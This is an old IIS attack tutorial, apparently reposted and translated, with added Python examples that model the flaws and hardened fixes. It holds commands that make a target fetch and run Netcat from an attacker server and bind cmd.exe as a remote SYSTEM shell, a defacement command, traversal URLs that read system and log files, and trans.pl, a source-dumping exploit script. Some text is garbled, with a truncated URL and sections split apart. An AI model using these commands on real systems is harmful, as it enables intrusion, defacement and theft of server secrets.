Some methods about IIS Hack

zhaozj 2021-02-08

By xundi (http://www.xfocus.org, xundi1@21cn.com)

Some IIS vulnerabilities are collected here for your reference.

1. Introduction

All of these methods work through port 80, and because a web server is by definition always reachable, they are a real threat. If you want to check a site for these holes, download a CGI scanner; two worth trying are "whisker" by rain forest puppy (www.wiretrip.net/rfp) and "CIS" by mnemonix (www.cerberus-infosec.co.uk).

To find out what kind of web server the target is running, connect with telnet and issue a HEAD request:

  telnet <target> 80
  HEAD / HTTP/1.0

(press Enter twice). The response headers name the server software and version. Some servers run the web service on port 8080, 81, 8000 or 8001 instead; telnet to that port in that case. If the web server speaks SSL, you can connect to it with the "SSLeay" tool instead of a browser:

  s_client -connect <target>:443
  HEAD / HTTP/1.0

2. Some common methods

========= IIS Hack =================

eEye (www.eeye.com) discovered a buffer overflow in IIS 4.0 that lets an attacker upload a program such as Netcat to the target server and bind cmd.exe to port 80. The overflow is in the handling of .htr, .idc and .stm files: the file name in a URL request for one of these file types is copied without a proper bounds check, so an attacker can insert code that downloads and executes a backdoor on the system.

To test a site for this you need two files, iishack.exe and ncx.exe, both downloadable from www.technotronic.com, plus a web server of your own (a virtual server is fine) from which the target will fetch ncx.exe.

Start your own web server, put ncx.exe in its document directory, then run iishack.exe against the target:

  C:\> iishack.exe <target> 80 <your-server>/ncx.exe

Then connect to the target with Netcat:

  C:\> nc <target> 80

If the overflow hit correctly you get a command prompt on the target machine, and it runs with SYSTEM privileges.

========= MDAC - remote command execution ===========

You may think this vulnerability is too old to matter, but it is so widespread that a great many IIS web servers still have it. IIS's MDAC component contains a flaw that lets an attacker execute system commands on your server remotely. The core of the problem is the RDS DataFactory object: by default it accepts commands sent to the IIS server from remote clients, and those commands run as the account IIS runs under, which by default is SYSTEM. Many articles describe this vulnerability in detail, so it is not explained at length here. To check whether a server has it:

  c:\> nc -nvv -w 2 <target> 80
  GET /msadc/msadcs.dll HTTP

If the reply contains

  application/x-varg

the server is very likely unpatched and vulnerable. You can then test with the two scripts from rain forest puppy's site (www.wiretrip.net/rfp), msadc.pl and msadc2.pl:

  C:\> msadc.pl -h <target>
  Please type the NT commandline you want to run (cmd /c assumed):
  cmd /c <command>

If you want to replace the other side's home page, you can do it like this:

  cmd /c echo Hacked by me > d:\inetpub\wwwroot\victimweb\index.htm

or run any other command. The best approach, I think, is still to upload Netcat and bind cmd.exe to port 80: set up your own TFTP server holding nc.exe, then run

  cmd /c cd %SystemRoot% && tftp -i <your-tftp-server> get nc.exe && del ftptmp && attrib -r nc.exe && nc.exe -l -p 80 -t -e cmd.exe

Connect to port 80 and you have a shell to browse around with. Ha ha!
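The two checks above (the HEAD banner grab from the introduction and the msadcs.dll content-type test) done from Python instead of by hand in telnet/nc, as an added example that is not part of xundi's article. It builds the same raw HTTP/1.0 request and pulls the Server header and Content-Type out of the reply; the responses below are constructed samples, not captures from a real server, and send_raw() is only used when you point the script at a live host.

```python
import socket

# Constructed sample responses (not captured from a real server) used to exercise the parser.
SAMPLE_HEAD_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Date: Mon, 15 May 2000 10:12:31 GMT\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)
SAMPLE_MSADCS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Content-Type: application/x-varg\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
SAMPLE_404_RESPONSE = (
    b"HTTP/1.1 404 Object Not Found\r\n"
    b"Server: Microsoft-IIS/4.0\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>not found</html>"
)


def build_request(method, path, host):
    """The raw HTTP/1.0 request the article types into telnet or nc."""
    return f"{method} {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_response(raw):
    """Split a raw response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def server_banner(raw):
    """What the HEAD / HTTP/1.0 trick in the introduction reveals: the Server header."""
    return parse_response(raw)[1].get("server", "")


def msadcs_exposed(raw):
    """The article's MDAC test: msadcs.dll answers 200 with content type application/x-varg."""
    status, headers, _ = parse_response(raw)
    return status == 200 and headers.get("content-type", "").lower().startswith("application/x-varg")


def send_raw(host, port, request, timeout=5.0):
    """Live helper: send one raw request and read the whole reply (not used by the offline checks)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        print("Server:", server_banner(send_raw(target, 80, build_request("HEAD", "/", target))))
        print("msadcs.dll exposed:", msadcs_exposed(send_raw(target, 80, build_request("GET", "/msadc/msadcs.dll", target))))
    else:
        print("Server:", server_banner(SAMPLE_HEAD_RESPONSE))
        print("msadcs.dll exposed:", msadcs_exposed(SAMPLE_MSADCS_RESPONSE))
```

The content-type test is exactly the article's "application/x-varg" heuristic: it proves msadcs.dll is reachable, not that RDS DataFactory is unpatched, so treat a hit as a reason to run msadc.pl, not as a confirmed hole.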
========= codebrws.asp & showcode.asp ==================

codebrws.asp and showcode.asp are source-viewer programs shipped with IIS 4.0. They are not installed by default; they appear only if the administrator chose to install the sample files. The viewers do not properly restrict which files they will open, so a remote attacker can use them to read the contents of files on the target machine. Note the following:

1. codebrws.asp and showcode.asp are not installed by default.
2. The vulnerability only lets you view file contents.
3. It cannot bypass the Windows NT ACLs.
4. Only files on the same partition as the viewer can be read (so installing the IIS directory on a different partition from WINNT is a good idea; it also helps against the recent IIS 5.0 Unicode vulnerability).
5. The attacker needs to know the name of the file to request.

If you find one of these files and the conditions above are met, you can request, for example:

  http://www.victim.com/iissamples/exair/howitworks/codebrws.asp?Source=/iissamples/exair/howitworks/codebrws.asp

which shows the source code of codebrws.asp itself. showcode.asp can be used the same way:

  http://www.victim.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/../../../../winnt/win.ini

I like to read the FTP log to learn which other machines the target's administrators use regularly; their security may well be worse than the web server's ;), for example:

  http://xxx.xxx.xxx.xxx/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../winnt/system32/logfiles/MSFTPSVC1/EX00517.LOG

========= null.htw ===============

If IIS is running Index Server it has a vulnerability involving null.htw, even though no file by that name exists on the server. It discloses the source of ASP scripts, including sensitive information such as user names and passwords in global.asa. By sending a specially crafted URL to IIS, you can break out of the virtual directory and gain access to the logical partition and the root directory. The "hit-highlighting" function of Index Server does not adequately restrict which file types may be requested, so an attacker can read any file on the server. null.htw takes three variables from user input:

  CiWebhitsFile
  CiRestriction
  CiHiliteType

Passing them like this returns the source of default.asp:

  http://www.victim.com/null.htw?CiWebhitsFile=/default.asp%20&%20CiRestriction=none%20&%20CiHiliteType=full

No real .htw file is needed because the virtual file is held in memory.

======== webhits.dll & .htw ================

The hit-highlighting feature is provided by Index Server to show a web user the document with the terms of their original search highlighted. The name of the document is passed to the .htw file through the variable CiWebhitsFile; webhits.dll, an ISAPI application, handles the request, opens the file and returns the result. Because the user controls the CiWebhitsFile parameter passed to the .htw file, they can request any file, which exposes ASP source and other script contents.
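The showcode.asp and CiWebhitsFile traversals above are the same bug: a path taken from the query string is joined to the web root and opened, with at most a substring check in front of it. The following is an added example, not code from the article, that models the viewer's check next to a hardened one. It uses posix-style paths and a constructed in-memory "disk" so it runs anywhere; NT ACLs and the same-partition limit are not modelled, and the "/msadc/" substring check is the one the published L0pht advisory describes for showcode.asp.

```python
import posixpath

WEBROOT = "/inetpub/wwwroot"

# Constructed stand-in for the server's disk (posix-style paths; NT ACLs are not modelled).
FAKE_DISK = {
    "/inetpub/wwwroot/default.asp": "<% ' ASP source, connection string and all %>",
    "/inetpub/wwwroot/msadc/Samples/SELECTOR/showcode.asp": "<% ' the viewer itself %>",
    "/winnt/win.ini": "[fonts]\r\n",
}


def resolve_vulnerable(root, requested, must_contain="/msadc/"):
    """showcode.asp's original check: the requested path must contain the marker string,
    then root + requested is opened. The '..' segments collapse afterwards, so the opened
    path can lie anywhere on the partition. must_contain=None models the .htw case, which
    had no check at all."""
    if must_contain and must_contain not in requested:
        return None
    return posixpath.normpath(root + "/" + requested.lstrip("/"))


def resolve_hardened(root, requested, allowed_dir="msadc"):
    """Canonicalise first, then require the result to sit inside the allowed directory."""
    allowed = posixpath.normpath(posixpath.join(root, allowed_dir))
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if candidate == allowed or candidate.startswith(allowed + "/"):
        return candidate
    return None


def read_file(path):
    """Return the file contents from the constructed disk, or None."""
    return None if path is None else FAKE_DISK.get(path)


if __name__ == "__main__":
    evil = "/msadc/../../../../winnt/win.ini"
    print("vulnerable:", resolve_vulnerable(WEBROOT, evil), read_file(resolve_vulnerable(WEBROOT, evil)))
    print("hardened:  ", resolve_hardened(WEBROOT, evil))
    print("webhits:   ", resolve_vulnerable(WEBROOT, "/../../winnt/win.ini", must_contain=None))
```

The order is the whole point: normalise, then compare the canonical result against the canonical allowed directory. Checking the raw string for "/msadc/" (or for "..") before normalisation is what both viewers did, and it is why extra ".." segments walk straight out of the web root. On a real NTFS volume the canonicalisation step also has to handle case, 8.3 short names and stream suffixes, which the next sections cover.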

To find out whether a server has this vulnerability, request an .htw URL, for example:

  http://www.victw

If the server answers

  The format of the QUERY_STRING is invalid

then the vulnerability is present. The problem is webhits.dll's mapping for the .htw extension, so removing that mapping avoids the vulnerability. On a system you suspect, you can search for .htw files; the following are usually found:

  /iissamples/issamples/oop/qfullhit.htw
  /iissamples/issamples/oop/qsumrhit.htw
  /iissamples/exair/search/qfullhit.htw
  /iissamples/exair/search/qsumrhit.htw
  /iishelp/iis/misc/iirturnh.htw (usually the one to use)

An attacker can then read files on the system like this:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?CiWebhitsFile=/../../winnt/win.ini&CiRestriction=none&CiHiliteType=full

=== ASP alternate data streams (::$DATA) ==================

This vulnerability was published in mid-1998. $DATA is the main data stream attribute in which NTFS stores a file's contents. By constructing a specially formatted URL you can make IIS hand that data stream to your browser, which means the raw contents of the file, script code included. There are limits: the file must be on an NTFS partition ("fortunately" for security, most servers use NTFS), the file must be world-readable, and the unauthorized user needs to know the file name. IIS 1.0, 2.0, 3.0 and 4.0 on Windows NT have this problem. Microsoft released a fix for IIS 3.0 and 4.0; see the article "Supporting NTFS Alternate Data Streams by Asking Windows NT to Make the File Name Canonical". To view the contents of an .asp file, request its source with a URL such as:

  http://www.victim.com/default.asp::$DATA

To understand the data-stream feature of the NTFS file system, see this article: http://focus.silversand.net/newsite/skill/NTFS.TXT

========= ASP dot bug ====================

This is a fairly early vulnerability, found in 1997. It also leaks ASP source code to an attacker. It typically exists on IIS 3.0: appending one or more dots to the end of the requested URL causes the ASP source to be returned:

  http://www.victim.com/sample.asp.

======= ISM.DLL buffer truncation vulnerability ===============

This vulnerability was first discovered by the Cerberus Information Security team. It affects IIS 4.0 and 5.0 and lets an attacker view the contents of any file, including source code. By appending about 230 spaces (encoded as %20) to a file name and then adding the .htr extension, you make IIS believe the client requested an .htr file. The .htr extension is mapped to the ISM.DLL ISAPI application, so IIS passes the request to that DLL, which opens and executes the named file; but ISM.DLL truncates the file name buffer before doing so, the .htr suffix is cut off, and the contents of the file you wanted are returned. The attack only works against the first .htr request after the web service starts: it works only when ISM.DLL is first loaded into memory, and if an .htr request has already been sent to the machine the attack fails until the web service is stopped and restarted. CNNS later found that by varying the number of appended characters the attack can be repeated.

  http://www.victim.com/global.asa%20(...up to about 230 of them...)%20.htr

========= .idc / .idq path disclosure ===================

This one is similar to the ASP dot bug. On IIS 4.0 it reveals the physical path of the web directory, and oddly enough it has also been found on some IIS 5.0 systems. Appending an .idc or .ida suffix to a URL makes IIS try to run it; if the .idc file does not exist, the error message returned to the client gives the information away.
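The ::$DATA, trailing-dot and padded-.htr tricks in the last three sections all exploit one design flaw: IIS chose the handler by looking at the extension of the raw request name, while NTFS and the Win32 file APIs opened a different, canonical name (stream suffix dropped, trailing dots and spaces stripped, long names truncated). The following is an added example, not code from the article, that models that naive dispatch next to a canonicalise-first version. The script-map table, the 230-byte ISM.DLL limit and the handler names are taken from the article and simplified; the truncation is a simulation of the behaviour the article describes, not a reimplementation of ISM.DLL.

```python
from urllib.parse import unquote

# IIS 4.0 script maps as the article lists them (simplified).
SCRIPT_MAPS = {
    ".asp": "asp.dll", ".asa": "asp.dll", ".htr": "ism.dll",
    ".idc": "httpodbc.dll", ".idq": "idq.dll", ".ida": "idq.dll", ".htw": "webhits.dll",
}
STATIC = "static-file-handler"   # returns file bytes verbatim: for a script, that is source disclosure
ISM_BUFFER = 230                 # truncation length the article gives for ISM.DLL (illustrative)


def dispatch_by_ext(name):
    """Pick a handler from whatever follows the last '.' of the name."""
    _, dot, ext = name.rpartition(".")
    ext = ext.lower()
    if ext == "asa":
        return "403-forbidden"   # .asa is mapped to asp.dll precisely so it is never served raw
    return SCRIPT_MAPS.get("." + ext, STATIC) if dot else STATIC


def naive_dispatch(url_path):
    """Pre-fix behaviour: dispatch on the raw decoded name, let the handler open it."""
    name = unquote(url_path)
    handler = dispatch_by_ext(name)
    if handler == "ism.dll" and len(name) > ISM_BUFFER:
        # Simulated ISM.DLL truncation: the name is cut at the buffer size, which drops the
        # ".htr" suffix, and what is actually opened and returned is the file in front of it.
        name = name[:ISM_BUFFER].rstrip(" ")
        handler = STATIC
    return handler, name


def canonical_name(url_path):
    """Turn the request name into the name NTFS would actually open."""
    name = unquote(url_path)
    name = name.split("::", 1)[0]   # drop an NTFS stream suffix such as ::$DATA
    name = name.rstrip(". ")        # Win32 ignores trailing dots and spaces when opening a file
    return name


def hardened_dispatch(url_path, max_len=ISM_BUFFER):
    """Canonicalise first, refuse over-long names instead of truncating, then dispatch."""
    name = canonical_name(url_path)
    if len(name) > max_len:
        return "400-reject", name
    return dispatch_by_ext(name), name


if __name__ == "__main__":
    padded = "/global.asa" + "%20" * ISM_BUFFER + ".htr"
    for url in ("/default.asp::$DATA", "/sample.asp.", padded, "/iisadmpwd/achg.htr"):
        print(url[:40], "naive:", naive_dispatch(url)[0], "| hardened:", hardened_dispatch(url)[0])
```

The hardened version is the shape of Microsoft's own fix as the article names it ("asking Windows NT to make the file name canonical"): every decision about a file is made on the canonical name, and a name the handler cannot hold is rejected rather than silently shortened.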

  http://www.victim.com/anything.idc   or   http://www.victim.com/anything.idq

========= global.asa +.htr =============

This vulnerability is similar to the one reported by NSFOCUS: appending .htr to the URL of certain .asa and .asp files causes the file's source to be disclosed:

  http://www.victim.com/global.asa.htr

=========== NT Site Server adsamples vulnerability ======

By requesting site.csc, normally stored at /adsamples/config/site.csc, an attacker may obtain information such as database details, for example:

  http://www.victim.com/adsamples/config/site.csc

========== Brute forcing through the iisadmpwd .htr programs ===========

IIS 4.0 has an interesting feature that lets a remote user attack the user accounts on the web server, and it works even when the server sits behind NAT. Every IIS 4.0 installation creates a virtual directory /iisadmpwd containing a number of .htr files. Anonymous users are allowed to access them; the files were simply never restricted to the loopback address (127.0.0.1). Requesting them brings up a dialog that lets you change a user's account password through the web. The directory maps to c:\winnt\system32\inetsrv\iisadmpwd and contains:

  achg.htr
  aexp.htr
  aexp2.htr
  aexp2b.htr
  aexp3.htr
  aexp4.htr
  aexp4b.htr
  anot.htr
  anot3.htr

With these, an attacker can guess your passwords. If you don't use this service, delete the directory.

============= Translate: f bug ====================

Daniel Docekal released this vulnerability on August 15, 2000 (www.securityfocus.com/bid/1578). The problem lies in the WebDAV support of Office 2000 and the FrontPage 2000 Server Extensions. When someone requests an ASP/ASA or other script file with an HTTP GET that carries the header Translate: f (and a backslash appended to the file name), the source code of the requested file is returned instead of being executed, at least on systems without the Win2K SP1 patch.

This is a Windows 2000 vulnerability, but since the FrontPage 2000 Server Extensions can also be installed on IIS 4.0, it applies to IIS 4.0 as well. You can use the following script (trans.pl) to exploit it:

#!/usr/bin/perl
# trans.pl - request a script file with "Translate: f" and a trailing
# backslash (%5C) so that the server returns its source instead of running it.
use strict;
use warnings;
use Socket;

my $server = $ARGV[0];
my $cm     = $ARGV[1];   # file to fetch, e.g. default.asp
my $port   = 80;

sub howto {
    print "Type as follows: trans.pl www.victim.com coretoview.asp\n\n";
}

sub connect_and_dump {
    if ($#ARGV < 1) { howto(); exit; }

    # The trailing %5C plus the Translate: f header triggers the source disclosure.
    my $ver = "GET /$cm%5C HTTP/1.0\r\nHost: $server\r\nAccept: */*\r\nTranslate: f\r\n\r\n";

    my $iaddr = inet_aton($server)               || die "Error: $!";
    my $paddr = sockaddr_in($port, $iaddr)       || die "Error: $!";
    my $proto = getprotobyname('tcp')            || die "Error: $!";
    socket(SOCK, PF_INET, SOCK_STREAM, $proto)   || die "Error: $!";
    connect(SOCK, $paddr)                        || die "Error: $!";
    send(SOCK, $ver, 0)                          || die "Can't send packet: $!";

    # Save everything the server returns (headers plus the file contents).
    open(my $out, '>', "$server.txt")            || die "Error: $!";
    print "Dumping $cm to $server.txt\n";
    while (<SOCK>) { print $out $_; }
    close $out;
    close SOCK;
}

connect_and_dump();

To get the source of default.asp, run:

  trans.pl www.victim.com default.asp

============= IIS Unicode parsing error vulnerability =============================

The NSFOCUS security team found a flaw in the Unicode character decoding of Microsoft IIS 4.0 and 5.0 that lets users remotely execute arbitrary commands through IIS. When IIS opens a file whose name contains Unicode characters, it decodes them; if the user supplies certain special encodings, IIS can be tricked into opening or executing files outside the web root directory. This section is taken from http://www.nsfocus.com/sa-06.htm, where a more detailed description can be found.

This vulnerability can be used as follows:

(1) If the system contains an executable directory, arbitrary system commands can be executed.
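The decoding flaw just described is a check-then-decode ordering bug: IIS tested whether the path climbed out of the virtual directory before it turned overlong UTF-8 sequences into the "/" and "\" they stand for. The following is an added example, not code from the article or from the NSFOCUS advisory, that shows the lenient decoder accepting the overlong forms, the containment check passing the encoded path and failing the plain one, and a hardened resolver that decodes strictly before it checks. It assumes the widely published ..%c0%af.. form of the request and that the /scripts virtual directory maps to a directory two levels below the drive root (c:\inetpub\scripts on a default install), written here posix-style so the code runs anywhere.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Assumed physical directory behind the /scripts virtual directory (c:\inetpub\scripts on a
# default install), written posix-style so the demo runs on any platform.
VDIR_ROOT = "/inetpub/scripts"


def decode_lenient_utf8(data):
    """Decode UTF-8 the way the article says IIS did: overlong two-byte forms are accepted,
    so C0 AF becomes '/' and C1 9C becomes '\\'. Three- and four-byte sequences are not
    needed for the demonstration and are replaced with U+FFFD."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def escapes_root(segments):
    """Containment test: does walking the segments ever climb above the starting directory?"""
    depth = 0
    for seg in segments:
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def vulnerable_resolve(path_after_scripts):
    """Check, then decode: the ordering bug. Takes the part of the URL after /scripts/."""
    raw = unquote_to_bytes(path_after_scripts)
    # The containment check sees "..\xc0\xaf.." as one odd segment, not as "..", and lets it through.
    if escapes_root(raw.decode("latin-1").replace("\\", "/").split("/")):
        return None
    # The lenient decode then turns C0 AF into '/', and the path really reads "../..".
    decoded = decode_lenient_utf8(raw).replace("\\", "/")
    return posixpath.normpath(VDIR_ROOT + "/" + decoded)


def hardened_resolve(path_after_scripts):
    """Decode strictly once, canonicalise, then check containment on the final path."""
    try:
        decoded = unquote_to_bytes(path_after_scripts).decode("utf-8")  # overlong forms raise
    except UnicodeDecodeError:
        return None
    decoded = decoded.replace("\\", "/")
    if escapes_root(decoded.split("/")):
        return None
    candidate = posixpath.normpath(VDIR_ROOT + "/" + decoded)
    if candidate != VDIR_ROOT and not candidate.startswith(VDIR_ROOT + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("..%c0%af../winnt/system32/cmd.exe", "../../winnt/system32/cmd.exe", "cgi/test.exe"):
        print(req, "| vulnerable:", vulnerable_resolve(req), "| hardened:", hardened_resolve(req))
```

Two lessons a practitioner can take from running it: a strict UTF-8 decoder (Python's default here) already rejects the overlong forms, so the hardened path never even reaches the containment check for them; and the containment check itself is fine, it was simply run on the wrong representation. Decode once, canonicalise, then check, and never re-decode afterwards.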

Please credit the original address when reposting: https://www.9cbs.com/read-1397.html
